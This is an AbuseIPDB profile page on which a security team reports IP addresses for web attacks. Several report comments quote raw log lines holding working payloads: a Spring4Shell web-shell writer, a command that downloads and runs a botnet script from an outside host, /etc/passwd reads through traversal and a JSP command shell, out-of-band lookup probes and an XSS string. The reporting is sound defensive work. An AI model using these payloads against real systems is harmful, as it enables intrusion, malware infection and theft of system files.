Fox Security Team - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User Fox Security Team joined AbuseIPDB in October 2022 and has reported 116 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇦🇺 154.26.154.182	15 Sep 2025	Aggressive web scan	Hacking Exploited Host Web App Attack
🇸🇬 167.172.6.243	26 Aug 2025	Web app scan & exploit	Hacking Exploited Host Web App Attack
🇺🇸 4.236.159.193	14 Aug 2025	Web aggressive scan	Hacking SQL Injection Exploited Host Web App Attack
🇮🇳 159.89.164.138	06 Aug 2025	GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 200 - 3980 - {Mozilla/5.0 (SS; Linux i686) AppleWebKit ... show more GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 200 - 3980 - {Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36} - [10.90.196.112:80] notmobile [0.063] " " show less	Hacking Web App Attack
🇭🇰 103.106.189.216	05 Aug 2025	103.106.189.216 GET /?class.module.classLoader.resources.context.parent.pipeline.first.directory=web ... show more 103.106.189.216 GET /?class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.prefix=fdsjqpnj&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1 403 - 177 - {Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36} - [-] notmobile [0] " " show less	Hacking Exploited Host Web App Attack
🇻🇳 123.30.76.70	01 Aug 2025	/stupidRumor_war/tomcatwar.jsp?pwd=j&cmd=wget http://dori.noirc0re.online/dori.sh \|\| /bin/busybox wg ... show more /stupidRumor_war/tomcatwar.jsp?pwd=j&cmd=wget http://dori.noirc0re.online/dori.sh \|\| /bin/busybox wget http://dori.noirc0re.online/dori.sh \|\| curl -O http://dori.noirc0re.online/dori.sh \|\| tftp sudori.noirc0re.online -c get dori.sh \|\| ftpget -v -u anonymous -P 21 sudori.noirc0re.online dori.sh dori.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a sora phantom dori kaiten Nbrute minerd /bin/busybox \|\| pkill -9 -f i .i mozi.m Mozi.m mozi.a Mozi.a sora phantom dori kaiten Nbrute minerd /bin/busybox; chmod 777 dori.sh; bash dori.sh CVE-2022-22965 & HTTP/1.1 400 show less	Hacking Exploited Host
🇸🇬 159.89.211.52	30 Jun 2025	Web aggressive scan	Hacking Exploited Host Web App Attack
🇻🇳 123.31.24.138	24 Jun 2025	123.31.24.138 HEAD /db.war HTTP/1.1 404 - 0 http://bapi.xxx.vn/db.war {Mozilla/5.0 (compatible; MSIE ... show more 123.31.24.138 HEAD /db.war HTTP/1.1 404 - 0 http://bapi.xxx.vn/db.war {Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)} - [-] notmobile [0] "optional" show less	Hacking Exploited Host Web App Attack
🇸🇬 167.172.6.243	23 Jun 2025	67.172.6.243 GET /?class.module.classLoader.resources.context.configFile=https://d1ce1dcpld8jg79812i ... show more 67.172.6.243 GET /?class.module.classLoader.resources.context.configFile=https://d1ce1dcpld8jg79812igyy813tf5bubaa.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1 404 - 146 - {Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.13.10 (KHTML, like Gecko) Version/17.2.97 Safari/616.13.10} - [-] notmobile [0] "optional -" show less	Hacking Exploited Host Web App Attack
🇺🇸 155.94.173.117	23 Jun 2025	Web aggressive scan	Hacking Exploited Host Web App Attack
🇸🇬 157.230.192.203	20 Jun 2025	Aggressive web scan & exploit	Hacking Exploited Host Web App Attack
🇮🇩 154.205.159.180	20 Jun 2025	SQL injection & exploiting	Hacking SQL Injection Exploited Host Web App Attack
🇮🇳 143.110.181.20	18 Jun 2025	Aggressive web scan	Hacking Exploited Host Web App Attack
🇻🇳 103.70.115.120	13 Jun 2025	web directory scan & exploit!	Hacking Exploited Host Web App Attack
🇳🇱 103.161.35.107	10 Jun 2025	aggressive scan & exploit	Hacking Exploited Host Web App Attack
🇮🇳 223.185.130.208	05 Jun 2025	/tin-tuc/chu-de/co-hoi-viec-lam?&&a=JJJ47QQQ&action=JJJ1QQQ&ajax=JJJ32QQQ&b5PGP=JJJ75QQQ&c=../../../ ... show more /tin-tuc/chu-de/co-hoi-viec-lam?&&a=JJJ47QQQ&action=JJJ1QQQ&ajax=JJJ32QQQ&b5PGP=JJJ75QQQ&c=../../../../../../../../../../../../../../etc/shells&charset=JJJ24QQQ&code=JJJ10QQQ&comment=JJJ30QQQ&content=JJJ29QQQ&continue=JJJ70QQQ&data=JJJ16QQQ&debug=JJJ33QQQ&dest=JJJ68QQQ&dir=JJJ56QQQ&do=JJJ49QQQ&edit=JJJ42QQQ&email=JJJ6QQQ&error=JJJ36QQQ&f=JJJ4QQQ&file=JJJ8QQQ&filename=JJJ60QQQ&filter=JJJ44QQQ&format=JJJ39QQQ&from=JJJ45QQQ&group=JJJ63QQQ&h=JJJ58QQQ&id=JJJ0QQQ&key=JJJ21QQQ&lang=JJJ19QQQ&limit=JJJ48QQQ&login=JJJ27QQQ&m=JJJ66QQQ&mode=JJJ17QQQ&name=JJJ3QQQ&next=JJJ72QQQ&offset=JJJ41QQQ&order=JJJ18QQQ&p=JJJ20QQQ&page=JJJ2QQQ&pass=JJJ55QQQ&path=JJJ54QQQ&plugin=JJJ50QQQ&post=JJJ26QQQ&preview=JJJ43QQQ&q=JJJ11QQQ&query=JJJ35QQQ&redirect=JJJ61QQQ&reference=JJJ73QQQ&s=JJJ25QQQ&save=JJJ37QQQ&search=JJJ28QQQ&show=JJJ57QQQ&site=JJJ74QQQ&sort=JJJ38QQQ&start=JJJ23QQQ&state=JJJ34QQQ&status=JJJ22QQQ&step=JJJ31QQQ&subject=JJJ65QQQ&t=JJJ14QQQ&tab=JJJ40QQQ&template=JJJ64QQQ&test=JJJ53QQQ&text=JJJ52QQQ&theme=JJJ51QQQ&title show less	Hacking Exploited Host Web App Attack
🇻🇳 183.80.199.120	05 Jun 2025	183.80.199.120 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP ... show more 183.80.199.120 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 403 MISS 254 - {Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0} - [10.90.7.40:82] not-sendo [1.009] " " show less	Hacking Exploited Host Web App Attack
🇸🇬 154.18.239.196	04 Jun 2025	154.18.239.196 ${:-820}${:-280}.${hostName}.uri.d0vti7tt4s1ana8b0g0g8eng8nn9hdo5x.oast.me	Hacking Exploited Host Web App Attack
🇻🇳 38.54.15.211	02 Jun 2025	38.54.15.211 GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/ ... show more 38.54.15.211 GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 301 - 162 - {Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36} - [-] notmobile [0] " " show less	Hacking Exploited Host Web App Attack
🇸🇬 167.99.28.125	30 May 2025	Aggressive web scan	Web Spam Hacking Exploited Host Web App Attack
🇸🇬 139.59.223.9	30 May 2025	139.59.223.9 GET /?class.module.classLoader.resources.context.configFile=http://d0sbiabe6bqnfefnq740 ... show more 139.59.223.9 GET /?class.module.classLoader.resources.context.configFile=http://d0sbiabe6bqnfefnq740e1c87eahhebiy.oast.site&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1 302 - 154 - {Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.9.17} - [-] notmobile [0] "optional" show less	Hacking Exploited Host Web App Attack
🇺🇸 82.29.72.40	29 May 2025	82.29.72.40 GET /api.war//////////////////../../../../../../../../etc/passwd HTTP/1.1 400 - 150 - {- ... show more 82.29.72.40 GET /api.war//////////////////../../../../../../../../etc/passwd HTTP/1.1 400 - 150 - {-} - [-] notmobile [0] " " show less	Hacking Exploited Host Web App Attack
🇸🇬 104.248.99.110	26 May 2025	Agressive SQL injection exploit	Hacking SQL Injection Exploited Host Web App Attack
🇸🇬 159.89.211.52	25 May 2025	/classifieds%22%3E%3Cimg+src=a+onerror=alert%28document.domain%29%3Eridxm/search?category=1	FTP Brute-Force Hacking Exploited Host Web App Attack
🇺🇸 162.253.155.145	23 May 2025	[23/May/2025:08:53:38 +0700] 162.253.155.145 GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 403 - 146 ... show more [23/May/2025:08:53:38 +0700] 162.253.155.145 GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 403 - 146 - {Mozilla/5.0 (CentOS; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0} - [-] notmobile [0] " " show less	Hacking Exploited Host Web App Attack